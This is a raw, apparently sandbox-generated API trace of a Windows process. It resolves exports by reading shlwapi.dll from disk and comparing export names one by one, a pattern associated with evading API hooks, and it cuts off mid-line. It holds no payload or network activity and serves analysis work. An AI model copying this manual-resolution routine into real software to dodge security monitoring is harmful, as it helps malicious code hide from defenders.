lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0112.485] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0112.486] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0112.486] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0112.486] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0112.486] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0112.486] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0112.486] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0112.486] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0112.486] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0112.486] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0112.692] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0112.692] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0112.692] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0112.693] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0112.693] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0112.697] GetProcessHeap () returned 0x4f0000 [0112.698] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2cf5030 | out: hHeap=0x4f0000) returned 1 [0112.698] GetProcessHeap () returned 0x4f0000 [0112.698] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x5092f0 [0112.698] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0112.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0112.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0112.699] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0112.699] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0112.700] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0112.700] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0112.700] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0112.700] GetProcessHeap () returned 0x4f0000 [0112.700] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x51148) returned 0x2cf5030 [0112.700] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0112.700] ReadFile (in: hFile=0x17c, lpBuffer=0x2cf5030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf5030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0112.704] CloseHandle (hObject=0x17c) returned 1 [0112.704] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0112.704] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0112.704] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0112.704] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0112.704] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0112.705] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0112.705] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0112.705] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0112.705] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0112.705] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0112.705] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0112.706] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0112.706] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0112.707] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0112.707] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0112.707] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0112.707] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0112.707] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0112.708] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0112.708] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0112.708] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0112.708] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0112.708] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0112.708] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0112.708] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0112.708] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0112.708] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0112.709] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0112.709] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0112.709] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0112.709] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0112.709] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0112.709] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0112.710] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0112.710] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0112.710] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0112.710] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0112.711] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0112.711] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0112.711] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0112.711] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0112.711] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0112.711] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0112.712] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0112.712] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0112.712] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0112.712] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0112.712] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0112.712] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0112.712] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0112.712] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0112.713] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0112.713] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0112.713] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0112.713] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0112.713] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0112.713] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0112.713] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0112.713] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0112.713] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0112.714] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0112.714] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0112.714] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0112.714] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0112.714] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0112.714] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0112.714] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0112.715] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0112.715] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0112.716] lstrcmpA 